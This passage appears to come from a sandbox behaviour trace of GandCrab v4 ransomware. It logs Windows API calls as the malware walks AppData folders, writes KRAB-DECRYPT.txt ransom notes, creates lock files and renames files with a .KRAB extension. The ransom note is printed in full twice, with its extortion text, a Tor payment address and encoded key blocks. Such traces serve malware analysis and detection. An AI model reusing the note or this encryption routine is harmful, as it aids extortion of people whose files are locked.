dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.437] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.438] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\\\KRAB-DECRYPT.txt") returned 64 [0085.438] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\sun\\java\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0085.439] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0085.439] WriteFile (in: hFile=0x474, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0085.440] CloseHandle (hObject=0x474) returned 1 [0085.440] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.441] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.441] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x20, wMilliseconds=0x283)) [0085.441] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.442] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0085.442] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0085.442] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\d2ca4a08d2ca4dee3d.lock") returned 70 [0085.442] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\sun\\java\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x474 [0085.443] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.444] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.444] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\") returned 47 [0085.444] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\*" [0085.444] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0x10230f8 [0085.444] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.444] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0085.444] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.444] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.444] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0085.444] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0085.445] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0085.445] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\d2ca4a08d2ca4dee3d.lock" [0085.445] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.445] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 75 [0085.445] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\d2ca4a08d2ca4dee3d.lock") returned 70 [0085.445] lstrlenW (lpString=".lock") returned 5 [0085.445] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.446] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0085.446] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.446] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.446] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0085.446] lstrcmpW (lpString1="Deployment", lpString2=".") returned 1 [0085.446] lstrcmpW (lpString1="Deployment", lpString2="..") returned 1 [0085.446] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\", lpString2="Deployment" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment" [0085.446] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\" [0085.447] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0085.447] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0085.447] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0085.447] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0085.447] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0085.447] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.447] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.448] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\\\KRAB-DECRYPT.txt") returned 75 [0085.448] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\sun\\java\\deployment\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0085.449] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0085.449] WriteFile (in: hFile=0x43c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0085.450] CloseHandle (hObject=0x43c) returned 1 [0085.450] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.450] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.450] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x20, wMilliseconds=0x283)) [0085.450] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.451] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0085.451] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0085.451] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\d2ca4a08d2ca4dee3d.lock") returned 81 [0085.451] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\sun\\java\\deployment\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x43c [0085.452] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.453] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.453] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\") returned 58 [0085.453] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\*" [0085.453] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0x10234f8 [0085.453] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.453] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0085.453] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.453] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.453] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0085.453] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0085.453] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0085.454] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\d2ca4a08d2ca4dee3d.lock" [0085.454] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.454] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 86 [0085.454] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\d2ca4a08d2ca4dee3d.lock") returned 81 [0085.454] lstrlenW (lpString=".lock") returned 5 [0085.454] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.454] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0085.455] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.455] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.455] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0085.455] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0085.455] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0085.455] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\KRAB-DECRYPT.txt" [0085.455] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.456] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\KRAB-DECRYPT.txt.KRAB") returned 79 [0085.456] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\KRAB-DECRYPT.txt") returned 74 [0085.456] lstrlenW (lpString=".txt") returned 4 [0085.456] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.456] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0085.456] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.456] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\KRAB-DECRYPT.txt") returned 74 [0085.456] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\KRAB-DECRYPT.txt") returned 74 [0085.456] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") 